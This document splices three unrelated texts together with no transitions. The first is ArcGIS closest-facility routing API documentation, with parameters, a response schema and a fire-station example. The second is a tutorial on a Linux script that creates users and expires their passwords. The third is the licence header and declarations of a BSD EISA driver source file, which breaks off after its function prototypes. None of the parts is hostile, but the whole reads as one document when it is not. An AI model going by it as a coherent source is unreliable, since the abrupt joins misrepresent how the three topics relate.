Example 1: Specifying polygon barriers using a JSON structure. The example shows how to add two polygons as barriers. The first polygon, named Flood zone, is a restriction polygon barrier that prohibits travel on the underlying streets. The polygon is a single-part polygon feature made up of four points. The second polygon, named Severe weather zone, is a scaled-cost polygon barrier that slows travel on the underlying streets to one third of the normal speed, tripling the travel time (Attr_TravelTime is 3). The polygon is a two-part polygon feature. Both parts are made up of four points. The barrier geometries are in the default spatial reference, WGS84. Hence, the spatialReference property is not required within the geometry property.

{ "features": [ { "geometry": { "rings": [ [ [ -97.0634, 32.8442 ], [ -97.0554, 32.84 ], [ -97.0558, 32.8327 ], [ -97.0638, 32.83 ], [ -97.0634, 32.8442 ] ] ] }, "attributes": { "Name": "Flood zone", "BarrierType": 0 } }, { "geometry": { "rings": [ [ [ -97.0803, 32.8235 ], [ -97.0776, 32.8277 ], [ -97.074, 32.8254 ], [ -97.0767, 32.8227 ], [ -97.0803, 32.8235 ] ], [ [ -97.0871, 32.8311 ], [ -97.0831, 32.8292 ], [ -97.0853, 32.8259 ], [ -97.0892, 32.8279 ], [ -97.0871, 32.8311 ] ] ] }, "attributes": { "Name": "Severe weather zone", "BarrierType": 1, "Attr_TravelTime": 3 } } ] }

Syntax for specifying polygon barriers using a URL returning a JSON response

{ "url": "<url>" }

Example 2: Specifying polygon barriers using a URL. The URL queries a few features from a map service. A URL querying features from a feature service can also be specified.

{ "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/7/query?where=1%3D1&returnGeometry=true&f=json" }

returnDirections

Specify whether the service should generate driving directions for each route. The default value is false.
• true—Generate directions. The directions are configured based on the values of the directionsLanguage, directionsOutputType, directionsStyleName, and directionsLengthUnits parameters. The directions are available in the directions property of the JSON response.
• false—Don't generate directions.

directionsLanguage

Specify the language that should be used when generating driving directions. This parameter applies only when the returnDirections parameter is set to true.
The service supports generating directions in the following languages:
• ar - Generate directions in Arabic
• cs - Generate directions in Czech
• de - Generate directions in German
• el - Generate directions in Greek
• en (default) - Generate directions in English
• es - Generate directions in Spanish
• et - Generate directions in Estonian
• fr - Generate directions in French
• he - Generate directions in Hebrew
• it - Generate directions in Italian
• ja - Generate directions in Japanese
• ko - Generate directions in Korean
• lt - Generate directions in Lithuanian
• lv - Generate directions in Latvian
• nl - Generate directions in Dutch
• pl - Generate directions in Polish
• pt-BR - Generate directions in Brazilian Portuguese
• pt-PT - Generate directions in Portuguese (Portugal)
• ru - Generate directions in Russian
• sv - Generate directions in Swedish
• tr - Generate directions in Turkish
• zh-CN - Generate directions in Simplified Chinese

The value for the parameter is specified using the language code. For example, directionsLanguage=zh-CN results in driving directions generated in Simplified Chinese.

Note: If an unsupported language code is specified, the service returns the directions in the default language, English.

directionsOutputType

Define the content and verbosity of the driving directions. This parameter applies only when the returnDirections parameter is set to true. The parameter can be specified using the following values:
• esriDOTComplete—Directions output that includes all directions properties.
• esriDOTCompleteNoEvents—Directions output that includes all directions properties except events.
• esriDOTInstructionsOnly—Directions output that includes text instructions, time, length, and ETA. Does not include geometry.
• esriDOTStandard (default)—Standard directions output: text instructions, geometry, time, length, and ETA. Does not include events, additional strings (street names, signpost information), maneuver type, bearings, or turn angle.
• esriDOTSummaryOnly—Directions output that contains only the summary (time and length). Detailed text instructions and geometry are not provided.

directionsStyleName

Specify the name of the formatting style for the directions. This parameter applies only when the returnDirections parameter is set to true. The parameter can be specified using the following values:
• NA Desktop (default)—Generates turn-by-turn directions suitable for printing.
• NA Navigation—Generates turn-by-turn directions designed for an in-vehicle navigation device.

directionsLengthUnits

Specify the units for displaying travel distance in the driving directions. This parameter applies only when the returnDirections parameter is set to true. The parameter can be specified using one of the following values:
• esriNAUCentimeters
• esriNAUDecimalDegrees
• esriNAUDecimeters
• esriNAUFeet
• esriNAUInches
• esriNAUKilometers
• esriNAUMeters
• esriNAUMiles (default)
• esriNAUMillimeters
• esriNAUNauticalMiles
• esriNAUPoints
• esriNAUYards

directionsTimeAttributeName

Set the time-based impedance attribute to display the duration of a maneuver, such as "Go northwest on Alvorado St. for 5 minutes." The units for all the time attributes are minutes.
• TravelTime (default)—Travel times for a car
• TruckTravelTime—Travel times for a truck
• WalkTime—Travel times for a pedestrian

outputLines

Use this parameter to specify the type of route features that are output by the service. This parameter is applicable only if the returnCFRoutes parameter is set to true.
The outputLines parameter can have one of the following values:
• esriNAOutputLineTrueShape—Return the exact shape of the resulting route, based on the underlying streets. This is the default value.
• esriNAOutputLineTrueShapeWithMeasure—Return the exact shape of the resulting route, based on the underlying streets, and include route measurements that keep track of the cumulative travel time or travel distance along the route relative to the first stop. When this value is chosen for the outputLines parameter, each point that makes up the route shape includes an M value along with the X and Y values. The M value, also known as the measure value, indicates the accumulated travel time or travel distance at that point along the route. The M values can be used to determine how far you have traveled from the start of the route, or the remaining distance or time left to reach the destination. The M values store travel time if the impedanceAttributeName is set to TravelTime, and store travel distance if the impedanceAttributeName is set to Kilometers or Miles.
• esriNAOutputLineStraight—Return a straight line between the incident and the closest facility.
• esriNAOutputLineNone—Do not return any shapes for the routes. This value can be useful in cases where you are only interested in determining the total travel time or travel distance of the route. For example, if your application has already calculated the route and some time later needs only to calculate the expected time of arrival (ETA) to the destination, you can set the returnCFRoutes parameter to true and the outputLines parameter to esriNAOutputLineNone. The routes property of the JSON response will then contain only the total travel time, which can be used to determine the ETA. Since the route shape is not returned when using the esriNAOutputLineNone value, the response size will be considerably smaller.

Tip: When the outputLines parameter is set to esriNAOutputLineTrueShape or esriNAOutputLineTrueShapeWithMeasure, the generalization of the route shape can be further controlled using appropriate values for the outputGeometryPrecision and outputGeometryPrecisionUnits parameters.

Note: No matter which value you choose for the outputLines parameter, the best route is always determined by minimizing the travel time or the travel distance, never the Euclidean (as-the-crow-flies) distance between the stops. This means that only the route shapes differ, not the underlying streets that are searched when finding the route.

returnFacilities

Use this parameter to specify whether facilities will be returned by the service. The possible values for this parameter are true or false. A true value indicates that the facilities used as input will be returned as part of the facilities property in the JSON response. The default value for this parameter is false.

If you have specified the facilities parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, returning facilities can allow you to draw the facility locations in your application. You may also want to set the returnFacilities property to true in order to determine whether the facilities were successfully located on the street network, or had some other errors, by checking the Status property in the JSON response.

returnIncidents

Use this parameter to specify whether incidents will be returned by the service. The possible values for this parameter are true or false.
A true value indicates that the incidents used as input will be returned as part of the incidents property in the JSON response. The default value for this parameter is false.

If you have specified the incidents parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, returning incidents can allow you to draw the incident locations in your application. You may also want to set the returnIncidents property to true in order to determine whether the incidents were successfully located on the street network, or had some other errors, by checking the Status property in the JSON response.

returnBarriers

Specify whether barriers will be returned by the service.
• true—The input point barriers are returned as part of the barriers property in the JSON response.
• false (default)—Point barriers are not returned.

Setting this parameter has no effect if you don't also specify a value for the barriers parameter. If you have specified the barriers parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, returning barriers can allow you to draw the point barrier locations in your application. You may also want to set the returnBarriers property to true to see where the barriers were located on the street network or, if they weren't located at all, to understand what the problem was by checking the Status property in the JSON response.

returnPolylineBarriers

Specify whether polyline barriers will be returned by the service.
• true—The input polyline barriers are returned as part of the polylineBarriers property in the JSON response.
• false (default)—Polyline barriers are not returned.

Setting this parameter has no effect if you don't also specify a value for the polylineBarriers parameter. If you have specified the polylineBarriers parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, the returnPolylineBarriers parameter can be set to true so that you can draw the polyline barrier locations in your application.

returnPolygonBarriers

Specify whether polygon barriers will be returned by the service.
• true—The input polygon barriers are returned as part of the polygonBarriers property in the JSON response.
• false (default)—Polygon barriers are not returned.

Setting this parameter has no effect if you don't also specify a value for the polygonBarriers parameter. If you have specified the polygonBarriers parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, the returnPolygonBarriers parameter can be set to true so that you can draw the polygon barrier locations in your application.

ignoreInvalidLocations

Specify whether invalid input locations should be ignored when finding the best solution. An input point is deemed invalid by the service if there are no streets within 12.42 miles (20 kilometers) of the point's location.
• true (default)—Invalid points are ignored, and the analysis proceeds with the valid points.
• false—Any invalid point in your request causes the service to return a failure.

outSR

Use this parameter to specify the spatial reference of the geometries, such as line or point features, returned by the service. The parameter value can be specified as a well-known ID (WKID) for the spatial reference. If outSR is not specified, the geometries are returned in the default spatial reference, WGS84.
See Geographic coordinate systems and Projected coordinate systems to look up WKID values. Many of the basemaps provided by ArcGIS Online are in the Web Mercator spatial reference (WKID 102100). Specifying outSR=102100 returns the geometries in the Web Mercator spatial reference, which can be drawn on top of the basemaps.

outputGeometryPrecision

Use this parameter to specify by how much you want to simplify the route geometry returned by the service.

Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode.

Simplification maintains critical points on a route, such as turns at intersections, to define the essential shape of the route, and removes other points. The simplification distance you specify is the maximum allowable offset that the simplified line can deviate from the original line. Simplifying a line reduces the number of vertices that are part of the route geometry. This reduces the overall response size and also improves the performance of drawing the route shapes in applications. The default value for this parameter is 10. The units are specified with the outputGeometryPrecisionUnits parameter.

outputGeometryPrecisionUnits

Use this parameter to specify the units for the value given in the outputGeometryPrecision parameter.

Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode.

The parameter value should be specified as one of the following values:
• esriCentimeters
• esriDecimalDegrees
• esriDecimeters
• esriFeet
• esriInches
• esriKilometers
• esriMeters (default)
• esriMiles
• esriMillimeters
• esriNauticalMiles
• esriPoints
• esriYards

overrides

Specify additional settings that can influence the behavior of the solver when finding solutions for the network analysis problems. The value for this parameter needs to be specified in JavaScript Object Notation (JSON). The values can be a number, a Boolean, or a string.

{ "overrideSetting1" : "value1", "overrideSetting2" : "value2" }

The default value for this parameter is no value, which indicates not to override any solver settings. Overrides are advanced settings that should be used only after careful analysis of the results obtained before and after applying the settings. A list of supported override settings for each solver and their acceptable values can be obtained by contacting Esri Technical Support.

JSON response

The JSON response from the closest facility service is based on the following syntax. The actual properties returned in the response depend upon the request parameters. For example, the routes property is returned only if the returnCFRoutes parameter is set to true. If a request fails, the JSON response contains only the error property. The examples in the subsequent section illustrate the response returned with specific request parameters.

JSON response syntax for a successful request

{
"routes": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <polyline1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <polyline2> } }, //.... additional routes ] },
"facilities": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <point1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <point2> } }, //.... additional facilities ] },
"incidents": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <point1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <point2> } }, //.... additional incidents ] },
"barriers": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <point1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <point2> } }, //.... additional point barriers ] },
"polylineBarriers": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <polyline1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <polyline2> } }, //.... additional polyline barriers ] },
"polygonBarriers": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <polygon1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <polygon2> } }, //.... additional polygon barriers ] },
"directions": [ { "routeId": <routeId1>, "routeName": "<routeName>", "summary": { "totalLength": <totalLength>, "totalTime": <totalTime>, "totalDriveTime": <totalDriveTime>, "envelope": { <envelope> } }, "features": [ { "attributes": { "length": <length1>, "time": <time1>, "text": "<text1>", "ETA": <ETA>, "maneuverType": "<maneuverType1>" }, "compressedGeometry": "<compressedGeometry1>" }, { "attributes": { "length": <length2>, "time": <time2>, "text": "<text2>", "maneuverType": "<maneuverType2>" }, "compressedGeometry": "<compressedGeometry2>" } ] }, { "routeId": <routeId2>, "routeName": "<routeName>", "summary": { "totalLength": <totalLength>, "totalTime": <totalTime>, "totalDriveTime": <totalDriveTime>, "envelope": { <envelope> } }, "features": [ { "attributes": { "length": <length1>, "time": <time1>, "text": "<text1>", "ETA": <ETA>, "maneuverType": "<maneuverType1>" }, "compressedGeometry": "<compressedGeometry1>" }, { "attributes": { "length": <length2>, "time": <time2>, "text": "<text2>", "maneuverType": "<maneuverType2>" }, "compressedGeometry": "<compressedGeometry2>" } ] }, //.... directions for additional routes ],
"messages": [ { "type": <type1>, "description": <description1> }, { "type": <type2>, "description": <description2> }, //.... additional messages ]
}

JSON response syntax for a failed request

{ "error": { "code": <code>, "message": "<message>", "details": [ "<details>" ] } }

Usage limits

The table below lists the limits that apply to this service.
• Maximum number of incidents: 100
• Maximum number of facilities: 100
• Maximum number of facilities to find (per incident): 10
• Maximum number of (point) barriers: 250
• Maximum number of street features intersected by polyline barriers: 500
• Maximum number of street features intersected by polygon barriers: 2,000
• Force hierarchy beyond a straight-line distance of: 50 miles (80.46 kilometers). (If the straight-line distance between any facility and incident is greater than this limit, the analysis uses hierarchy, even if useHierarchy is set to false.)
• Maximum snap tolerance: 12.42 miles (20 kilometers). (If the distance between an input point and its nearest traversable street is greater than the distance specified here, the point is excluded from the analysis.)
• Maximum time a client can use the synchronous closest facility service: 5 minutes (300 seconds)

Examples

Note: If you copy and paste the request URL from the examples into a web browser, you will get an invalid token error message. You need to replace <yourToken> with a valid token. See Accessing services provided by Esri to learn how to generate one.

Finding closest fire stations

This example shows how to find the two fire stations that can provide the quickest response to a fire at a given incident location within three minutes. You will also generate routes and driving directions for the firefighters to follow.

We specify the four fire stations in the area as the facilities parameter. We use the JSON structure to specify the facilities parameter because we want to specify the name of each fire station, which the service can use when generating driving directions for the routes from the fire stations. The geometries are in the default spatial reference, WGS84. Hence, the spatialReference property is not specified. We specify the longitude and latitude values for the fire location as the incidents parameter.

Since we need to find the two closest fire stations, we specify 2 as the value for the defaultTargetFacilityCount parameter. In order to model the fire engines traveling from the stations to the fire (incident), we specify esriNATravelDirectionFromFacility as the value for the travelDirection parameter. We need to search for fire stations that are within three minutes of the fire; hence, we specify 3 as the value for the defaultCutoff parameter. Any fire stations outside the cutoff time are ignored by the service.

As we need to generate driving directions and report the distance information within the directions in miles, we specify the returnDirections parameter as true and the directionsLengthUnits parameter as esriNAUMiles. In order to get the route geometries, we specify the returnCFRoutes parameter as true. We also specify 102100 as the value for the outSR parameter so that the output routes are returned in the Web Mercator spatial reference and can be displayed on top of an ArcGIS Online basemap.
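The raw request URL below shows the full set of parameters. The same request might be assembled programmatically; here is a minimal Python sketch using the third-party requests library (an assumption, not part of the service documentation) — it also adds f=json explicitly to request a JSON response, and the token value is a placeholder you must supply:

```python
import requests

token = "<yourToken>"  # replace with a valid token

params = {
    "f": "json",  # ask for a JSON response
    "token": token,
    "incidents": "-122.4496,37.7467",  # the fire location
    "facilities": (
        '{"features":['
        '{"attributes":{"Name":"Station 11"},"geometry":{"x":-122.4267,"y":37.7486}},'
        '{"attributes":{"Name":"Station 20"},"geometry":{"x":-122.4561,"y":37.7513}},'
        '{"attributes":{"Name":"Station 24"},"geometry":{"x":-122.4409,"y":37.7533}},'
        '{"attributes":{"Name":"Station 39"},"geometry":{"x":-122.4578,"y":37.7407}}]}'
    ),
    "defaultTargetFacilityCount": 2,
    "travelDirection": "esriNATravelDirectionFromFacility",
    "defaultCutoff": 3,
    "returnCFRoutes": "true",
    "returnDirections": "true",
    "directionsLengthUnits": "esriNAUMiles",
    "outSR": 102100,
}

url = ("http://route.arcgis.com/arcgis/rest/services/World/ClosestFacility/"
       "NAServer/ClosestFacility_World/solveClosestFacility")
response = requests.get(url, params=params).json()
```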
Request URL

http://route.arcgis.com/arcgis/rest/services/World/ClosestFacility/NAServer/ClosestFacility_World/solveClosestFacility?token=<yourToken>&incidents=-122.4496,37.7467&facilities={"features":[{"attributes":{"Name":"Station 11"},"geometry":{"x":-122.4267,"y":37.7486}},{"attributes":{"Name":"Station 20"},"geometry":{"x":-122.4561,"y":37.7513}},{"attributes":{"Name":"Station 24"},"geometry":{"x":-122.4409,"y":37.7533}},{"attributes":{"Name":"Station 39"},"geometry":{"x":-122.4578,"y":37.7407}}]}&defaultTargetFacilityCount=2&travelDirection=esriNATravelDirectionFromFacility&defaultCutoff=3&returnCFRoutes=true&returnDirections=true&directionsLengthUnits=esriNAUMiles&outSR=102100

JSON response

The response contains two route features representing the best route to travel from each of the two closest fire stations to the incident. The response includes the routes and directions properties because the returnCFRoutes and returnDirections parameters are set to true in the request.

Note: Because the response is quite verbose, the repeated elements within the response are abbreviated for clarity.

{ "messages": [],
"routes": { "fieldAliases": { "ObjectID": "ObjectID", "FacilityID": "FacilityID", "FacilityRank": "FacilityRank", "Name": "Name", "IncidentCurbApproach": "IncidentCurbApproach", "FacilityCurbApproach": "FacilityCurbApproach", "IncidentID": "IncidentID", "Total_TravelTime": "Total_TravelTime", "Total_Kilometers": "Total_Kilometers", "Total_Miles": "Total_Miles", "Shape_Length": "Shape_Length" }, "geometryType": "esriGeometryPolyline", "spatialReference": { "wkid": 102100, "latestWkid": 3857 },
"features": [
{ "attributes": { "ObjectID": 1, "FacilityID": 4, "FacilityRank": 1, "Name": "Station 39 - Location 1", "IncidentCurbApproach": 2, "FacilityCurbApproach": 1, "IncidentID": 1, "Total_TravelTime": 1.7600910249204684, "Total_Kilometers": 1.0394628115064781, "Total_Miles": 0.6458922464721514, "Shape_Length": 1309.3896042400702 }, "geometry": { "paths": [ [ [ -13631945.0834, 4542876.163199998 ], [ -13631904.317499999, 4542899.317500003 ], //.... additional points in the route ] ] } },
{ "attributes": { "ObjectID": 2, "FacilityID": 2, "FacilityRank": 2, "Name": "Station 20 - Location 1", "IncidentCurbApproach": 1, "FacilityCurbApproach": 1, "IncidentID": 1, "Total_TravelTime": 1.898575185300166, "Total_Kilometers": 0.9460863750832559, "Total_Miles": 0.5878708188449802, "Shape_Length": 1229.0645653105717 }, "geometry": { "paths": [ [ [ -13631749.8412, 4544361.9076000005 ], [ -13631561.4534, 4544343.7250000015 ], //....
additional points in the route ] ] } } ] }, "directions": [ { "routeId": 1, "routeName": "Station 39 - Location 1", "summary": { "totalLength": 0.6458978652647239, "totalTime": 1.7600910260807723, "totalDriveTime": 1.7600910249204682, "envelope": { "xmin": -13631945.083355796, "ymin": 4542859.901880716, "xmax": -13631013.761512483, "ymax": 4543705.678939983, "spatialReference": { "wkid": 102100, "latestWkid": 3857 } } }, "features": [ { "attributes": { "length": 0, "time": 0, "text": "Start at Station 39", "ETA": -2209161600000, "maneuverType": "esriDMTDepart" }, "compressedGeometry": "+1-d00e8+4akcs+0+0" }, { "attributes": { "length": 0.5233336473178214, "time": 1.4396464250141916, "text": "Go northeast on PORTOLA DR toward REX AVE", "ETA": -2209161600000, "maneuverType": "esriDMTStraight" }, "compressedGeometry": "+1-d00e8+4akcs+19+n+40+2p+16+12+l+12+22+45+1j+21+1t+22+29+20+51+3n+1m+u+2r+16" }, { "attributes": { "length": 0.1137367543451464, "time": 0.29078273135879606, "text": "Turn left on TWIN PEAKS BLVD", "ETA": -2209161600000, "maneuverType": "esriDMTTurnLeft" }, "compressedGeometry": "+1-cvvln+4al2j-7+19+3+c+9+9+1o+8+i+9+23+1b" }, { "attributes": { "length": 0.008827463601756125, "time": 0.02966186854748069, "text": "Make sharp left on PANORAMA DR", "ETA": -2209161600000, "maneuverType": "esriDMTSharpLeft" }, "compressedGeometry": "+1-cvvh5+4al6d-c+d" }, { "attributes": { "length": 0, "time": 0, "text": "Finish at Location 1", "ETA": -2209161600000, "maneuverType": "esriDMTStop" }, "compressedGeometry": "+1-cvvhh+4al6q+0+0" } ] }, { "routeId": 2, "routeName": "Station 20 - Location 1", "summary": { "totalLength": 0.5878759328933506, "totalTime": 1.8985751853324473, "totalDriveTime": 1.898575185300166, "envelope": { "xmin": -13631750.69648736, "ymin": 4543704.557076369, "xmax": -13631026.43439348, "ymax": 4544361.9075978, "spatialReference": { "wkid": 102100, "latestWkid": 3857 } } }, "features": [ { "attributes": { "length": 0, "time": 0, "text": "Start at Station 20", "ETA": -2209161600000, "maneuverType": "esriDMTDepart" }, "compressedGeometry": "+1-d0085+4alra+0+0" }, { "attributes": { "length": 0.21782291983305227, "time": 0.6974671774325343, "text": "Go east on OLYMPIA WAY toward DELLBROOK AVE", "ETA": -2209161600000, "maneuverType": "esriDMTStraight" }, "compressedGeometry": "+1-d0085+4alra+37-4+2m-e+3g-a+4a+6" }, { "attributes": { "length": 0.3700530130602983, "time": 1.2011080078676315, "text": "Turn right on PANORAMA DR", "ETA": -2209161600000, "maneuverType": "esriDMTTurnRight" }, "compressedGeometry": "+1-cvvqe+4alqk+6-c6+a-t+4e-5s+h-7+2k+0+q-k" }, { "attributes": { "length": 0, "time": 0, "text": "Finish at Location 1", "ETA": -2209161600000, "maneuverType": "esriDMTStop" }, "compressedGeometry": "+1-cvvhh+4al6q+0+0" } ] } ] }
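Once the response arrives, pulling out the summary figures is straightforward. A minimal sketch, assuming the parsed response from the earlier Python example is bound to the variable response:

```python
# List each returned route with its travel time and distance.
for route in response["routes"]["features"]:
    attrs = route["attributes"]
    print(f'{attrs["Name"]}: '
          f'{attrs["Total_TravelTime"]:.2f} min, '
          f'{attrs["Total_Miles"]:.2f} mi')

# Print the turn-by-turn text for the first (closest) route.
closest = response["directions"][0]
print(closest["routeName"], f'({closest["summary"]["totalTime"]:.2f} min)')
for step in closest["features"]:
    print(" -", step["attributes"]["text"])
```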
Linux Script to Add User and Password Expiry with Conditional Checks

In the last article, we'd seen how to get started with Linux scripts. In that, we created a basic scripting file and showed how to change permissions and add the path variables (or use the existing ones). Now that we know the skeleton of a basic script, it's time to show how it can actually be useful. In an earlier article, we'd taken a look at how to expire passwords in Linux. When the user logs in for the first time, we want to force them to change their password. This consists of three steps:

1. Create the user;
2. Set a default password;
3. Expire the password immediately.

The commands for these three actions are as follows:

useradd [username]
passwd [username]
passwd -e [username]

Running them separately gives us the following output:

To execute these, we need to learn about Linux script parameters.

Script Parameters

To string these three commands together, we're going to create our own script called "adduserexpass". This command will take in the username as a parameter and execute the above three commands together. When we run our script, we will pass the desired username as a parameter like this:

adduserexpass [username]

Scripts can reference parameters by using the following method:

• $0 equals the script name itself;
• $1 refers to the first parameter;
• $2 refers to the second parameter;
• …and so on and so forth.

So in the above example, we refer to [username] using $1. So the three commands within the script simply become:

useradd $1
passwd $1
passwd -e $1

Input Verification

It's important for us to check the validity of an input before we manipulate it. For example, the script makes no sense unless we actually provide a parameter. So the first thing we're going to do is to check whether or not a parameter exists. If not, we display an error message and exit the script. Like this:

if [ "$1" == "" ]; then
echo "Missing username parameter"
exit 1
fi

A few things to note about this conditional statement. First, it's important to keep whitespace around the square bracket "[" in the following statement:

if [ "$1" == "" ]

This is because shell scripts are not strictly a programming language by themselves. Without the spaces, the Linux environment treats the entire string as a single command. (Also note that the == comparison works when /bin/sh is bash; a strictly POSIX shell, such as dash, expects a single = instead.)

Second, note that the parameter $1 is surrounded by quotation marks (""). All of these little things can make debugging very difficult for Linux shell scripts. The best way to code them is to find an existing script that works and make changes to it.

Also, unlike many other programming languages, you don't need to end every command with a semicolon ";". However, if the next piece of code is on the same line, then the semicolon is necessary to separate the commands from one another, like in this extract:

if [ "$1" == "" ]; then

Here, the "then" is on the same line, so we need the semicolon after the closing bracket.

Check if the Username Already Exists

We also need to make sure that we're not passing an existing username to the script. Otherwise, we'll end up resetting the password and expiring it for an existing user! The way to do this is to use the "id -u" command and test the result like this:

if id -u "$1" >/dev/null 2>&1; then
echo "User already exists"
exit 1
fi

In this conditional statement, I execute the command "id -u $1". I don't want the output to be shown in the shell, so I send it to an imaginary black hole, /dev/null.
However, if the command succeeds (meaning the user was found), we echo that the user already exists and exit the script.

Putting it all Together

Taking all the components together, we have the following final script:

#!/bin/sh
# This will take the username as a parameter, referred to as $1
if [ "$1" == "" ]; then
echo "Missing username parameter"
exit 1
fi
if id -u "$1" >/dev/null 2>&1; then
echo "User already exists"
exit 1
fi
useradd $1
passwd $1
passwd -e $1

This gives us the output when run under the following scenarios:

Missing username:

Username already exists:

User created, password set, and expired all with one command:

And there we have a script that executes three commands all at once, with full conditional statements that check for invalid inputs! This technique can be used to automate a whole bunch of tasks in Linux that would normally be pretty time-consuming. The flexibility to accept parameters allows us to create new commands that we can then distribute to other people as well.
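One refinement worth mentioning: passwd prompts interactively, which makes the script awkward to run unattended. A minimal variant sketch, assuming the chpasswd utility is available and that the initial password is passed as a second parameter (both are assumptions, not part of the original script):

```sh
#!/bin/sh
# Usage: adduserexpass <username> <initial-password>
[ -z "$1" ] && { echo "Missing username parameter"; exit 1; }
[ -z "$2" ] && { echo "Missing password parameter"; exit 1; }
if id -u "$1" >/dev/null 2>&1; then
    echo "User already exists"
    exit 1
fi
useradd "$1"
# chpasswd reads "user:password" pairs from stdin -- no prompting.
# NB: a password given on the command line is visible in `ps` output,
# so this is fine for a lab, less so for production use.
echo "$1:$2" | chpasswd
passwd -e "$1"
```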
FreeBSD/Linux Kernel Cross Reference: sys/dev/eisa/cac_eisa.c

/*	$OpenBSD: cac_eisa.c,v 1.3 2008/06/26 05:42:14 ray Exp $	*/
/*	$NetBSD: cac_eisa.c,v 1.1 2000/09/01 12:15:20 ad Exp $	*/

/*-
 * Copyright (c) 2000 The NetBSD Foundation, Inc.
 * All rights reserved.
 *
 * This code is derived from software contributed to The NetBSD Foundation
 * by Andrew Doran.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS
 * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
 * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
 * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * Copyright (c) 2000 Jonathan Lemon
 * Copyright (c) 1999 by Matthew N. Dodd <[email protected]>
 * All Rights Reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions, and the following disclaimer,
 *    without modification, immediately at the beginning of the file.
 * 2. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
 * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

/*
 * EISA front-end for cac(4) driver.
 */

#include <sys/types.h>
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/device.h>

#include <machine/bus.h>
#include <machine/intr.h>

#include <dev/eisa/eisavar.h>
#include <dev/eisa/eisadevs.h>

#include <scsi/scsi_all.h>
#include <scsi/scsi_disk.h>
#include <scsi/scsiconf.h>

#include <dev/ic/cacreg.h>
#include <dev/ic/cacvar.h>

#define CAC_EISA_SLOT_OFFSET	0x0c88
#define CAC_EISA_IOSIZE		0x0017
#define CAC_EISA_IOCONF		0x38

int	cac_eisa_match(struct device *, void *, void *);
void	cac_eisa_attach(struct device *, struct device *, void *);

struct	cac_ccb *cac_eisa_l0_completed(struct cac_softc *);
int	cac_eisa_l0_fifo_full(struct cac_softc *);
void	cac_eisa_l0_intr_enable(struct cac_softc *, int);
